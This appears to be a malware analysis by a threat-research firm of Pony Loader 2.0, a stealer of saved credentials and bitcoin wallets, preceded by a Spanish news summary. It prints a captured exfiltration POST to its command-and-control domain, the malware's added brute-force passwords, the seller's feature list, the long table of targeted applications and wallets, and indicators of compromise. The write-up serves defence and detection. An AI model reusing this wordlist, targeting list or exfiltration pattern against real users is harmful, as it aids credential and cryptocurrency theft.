Las billeteras que esta amenaza tiene como blanco incluyen a Bitcoin, Litecoin, MultiBit, Namecoin, Terracoin, Primecoin, Feathercoin, NovaCoin, MegaCoin, Digitalcoin, Zetacoin, Fastcoin, Tagcoin, Bytecoin, Florincoin, and Luckycoin, y muchas otras figuran en el listado publicado por investigadores de seguridad de Damballa.
Pony Loader 2.0 mantiene su capacidad para robar contraseñas y propagar otros tipos de malware, y contiene una lista de palabras que se utilizan para ejecutar ataques de fuerza bruta en cuentas de usuarios, según la publicación de Damballa. Estas palabras fueron tomadas de listados publicados anteriormente después de ataques a diversos servicios, y se agregaron las siguientes:
Se cree que los comerciantes del código malicioso son de Rusia, y que están ofreciendo funcionalidades adicionales relacionadas a mejoras en la recolección de credenciales.
El troyano puede infectar a los usuarios a través de enlaces maliciosos en correos electrónicos o exploit kits, por lo que les recomendamos estar alertas para no caer víctimas de esta amenaza. La recomendación de Bitcoin es actualizar a las versiones más recientes del cliente, que incorporan un sistema para cifrar con contraseña las claves privadas contenidas en el monedero.
Pony Loader malware has been around for years. The source code for version 1.9 was leaked on the Internet, giving criminals the opportunity to modify it to their liking. Recently, Damballa’s Threat Research team observed Pony Loader version 2.0. This variant, which ups the potential payday for criminals, is also up for sale.
On May 28, 2014, the Damballa Threat Research team obtained an unknown malware sample for analysis. After performing an initial analysis, we observed HTTP traffic to the domain 602ef0b0[.]pw, which was hosted at CloudFlare global CDN (content delivery network). CloudFlare is a legitimate network used to ensure the availability and security of websites. Malware authors commonly attempt to host their malware using known, trusted infrastructure in an effort to avoid detection and make their traffic more difficult to identify and block.
Pony Loader, also referred to as Fareit, has been used over the past several years and has the ability to steal sensitive information from a victim’s computer and install additional malware. This may include stored credentials for email, web and FTP accounts. In the past, Pony has been used to distribute the P2P Gameover Zeus Trojan.
The Pony source code has been leaked on the Internet (version 1.9), which allows anyone to obtain the source and modify it for use in an attack campaign. Upon execution of this binary, we observed the following HTTP POST request sent to the command and control server:
===========================================================================
POST /llfrty.php HTTP/1.0
Host: 602ef0b0.pw
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 375
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.2; .NET CLR 2.0.50727)
..6.,..D…a.;@.Q..q1O%.=..Y.n.n…….U..
.2.XI\.!…….^”…/.SU.%…^.$..0…..R<.u..e.a..k.i….Z.g…A.H….b……Db.N
……..CD….=l….+._i`.l.%…….o#.`.MW.l.o.2. %x.I…-..m……….>..;.n..Q..:.9…*…3b……a”8V.S…
…9…kSN.7>.[6..C..r.aSF.....Ly\.T.9..........H.oF7(T.(.#.M...P(.....`$.....1.\2..
{......P|<Z%......v.m[.Y....g..s.3U_N
n.|.WB...`..?...A
===========================================================================
After identifying this malware as Pony / Fareit, we posted some initial information to a security mailing list. CloudFlare analysts were able to identify and suspend the account, preventing future C2 communications at the listed domain.
This version of Pony is not just the old dropper and credential stealer that has been seen with version 1.9. This Pony Loader sample had been updated to steal a victim's bitcoin wallet as well. This particular version is being sold on the criminal market as Pony Loader version 2.0.
This version was listed for sale in May 2014. However, Pony Loader 2.0 has been circulating on the Internet since early 2014. Now that the source is listed for sale, Damballa Researchers expect to see an increase in this type of bitcoin stealing malware with customized capabilities.
Pony Loader 1.9 contains a wordlist used to brute-force user accounts on a victim's computer that is also present in version 2.0. The attackers obtained the password list from some of the top passwords associated with several database hacks. The password list was obtained from:
Several passwords were added to this list:
1234567890
administrator
Administrator
billgates
gates
gfhjkm
ghbdtn
guest
Guest
helpassistant
HelpAssistant
mustdie
windows
The wordlist is used to enumerate local passwords with the LogonUserA Windows API call.
The criminals attempting to sell the source code for Pony 2.0 advertise the bitcoin programs that are targeted in the updated version. Damballa has verified the following list of bitcoin software in Pony version 2.0:
Electrum, MultiBit, Litecoin, Namecoin, Terracoin, Bitcoin Armory, PPCoin (Peercoin), Primecoin, Feathercoin, NovaCoin, Freicoin, Devcoin, Frankocoin, ProtoShares, MegaCoin, Quarkcoin, Worldcoin, Infinitecoin, Ixcoin, Anoncoin, BBQcoin, Digitalcoin, Mincoin, Goldcoin, Yacoin, Zetacoin, Fastcoin, I0coin, Tagcoin, Bytecoin, Florincoin, Phoenixcoin, Luckycoin, Craftcoin, Junkcoin and the original Bitcoin client.
In addition, the sellers are marketing additional features and 'upgrades' as follows - Russian to English translation:
[+] Implemented collection of Ya.Browser passwords, FTP Disk, new versions of Opera (code-based Chrome)
[*] When the program on behalf of the user SYSTEM (service Windows) will now run the loader file as an active session (logged on) Users
[*] Improved collect passwords Firefox, is no longer dependent on the availability of libraries SQLite3
[+] Optional redundant bootloader mode: if successfully loaded the first file – the rest will be skipped
[+] Added option to disable the collection of passwords (just leave the loader)
[-] Fixed processing SQLite3 files for Chrome / Firefox containing 48 bit integers
[-] Fixed a serious bug in several functions, which could lead to errors in the collection of passwords and reach program
Implemented instantaneous decoding of saved passwords for the following programs:
| FAR Manager | FTPGetter | Pocomail |
| Total Commander | ALFTP | IncrediMail |
| WS_FTP | Internet Explorer | The Bat! |
| CuteFTP | Dreamweaver | Outlook |
| FlashFXP | DeluxeFTP | Thunderbird |
| FileZilla | Google Chrome | FastTrackFTP |
| FTP Commander | Chromium / SRWare Iron | Bitcoin |
| BulletProof FTP | ChromePlus | Electrum |
| SmartFTP | Bromium (Yandex Chrome) | MultiBit |
| TurboFTP | Nichrome | FTP Disk |
| FFFTP | Comodo Dragon | Litecoin |
| CoffeeCup FTP / Sitemapper | RockMelt | Namecoin |
| CoreFTP | K-Meleon | Terracoin |
| FTP Explorer | Epic | Bitcoin Armory |
| Frigate3 FTP | Staff-FTP | PPCoin (Peercoin) |
| SecureFX | AceFTP | Primecoin |
| UltraFXP | Global Downloader | Feathercoin |
| FTPRush | FreshFTP | NovaCoin |
| WebSitePublisher | BlazeFTP | Freicoin |
| BitKinex | NETFile | Devcoin |
| ExpanDrive | GoFTP | Frankocoin |
| ClassicFTP | 3D-FTP | ProtoShares |
| Fling | Easy FTP | MegaCoin |
| SoftX | Xftp | Quarkcoin |
| Directory Opus | FTP Now | Worldcoin |
| FreeFTP / DirectFTP | Robo-FTP | Infinitecoin |
| LeapFTP | LinasFTP | Ixcoin |
| WinSCP | Cyberduck | Anoncoin |
| 32bit FTP | Putty | BBQcoin |
| NetDrive | Notepad + + | Digitalcoin |
| WebDrive | CoffeeCup Visual Site Designer | Mincoin |
| FTP Control | FTPShell | Goldcoin |
| Opera | FTPInfo | Yacoin |
| WiseFTP | NexusFile | Zetacoin |
| FTP Voyager | FastStone Browser | Fastcoin |
| Firefox | CoolNovo | I0coin |
| FireFTP | WinZip | Tagcoin |
| SeaMonkey | Yandex.Internet / Ya.Browser | Bytecoin |
| Flock | MyFTP | Florincoin |
| Mozilla | sherrod FTP | Phoenixcoin |
| LeechFTP | NovaFTP | Luckycoin |
| Odin Secure FTP Expert | Windows Mail | Craftcoin |
| WinFTP | Windows Live Mail | Junkcoin |
| FTP Surfer | Becky! |
See original postings on pastebin.com here:
The builder is still being marketed with the source code and makes creating the virus possible using only a few mouse clicks:
Damballa Threat Researchers are continuing to investigate the use of this malware on the Internet. Given the capability to steal stored credentials from a wide variety of software, users should consider storing their passwords and bitcoin private keys using these programs risky.
“Your wallet.dat file is not encrypted by the Bitcoin program by default but the most current release of the Bitcoin client provides a method to encrypt with a passphrase the private keys stored in the wallet. Anyone who can access an unencrypted wallet can easily steal all of your coins. Use one of these encryption programs if there is any chance someone might gain access to your wallet.” –
https://en.bitcoin.it/wiki/Securing_your_wallet#General_Solutions
Indicators:
143c9261b19118863882a2e9793d0840 – MD5 hash
602ef0b0.pw – Domain
– Isaac Palmer,
Malware Reverse Engineer
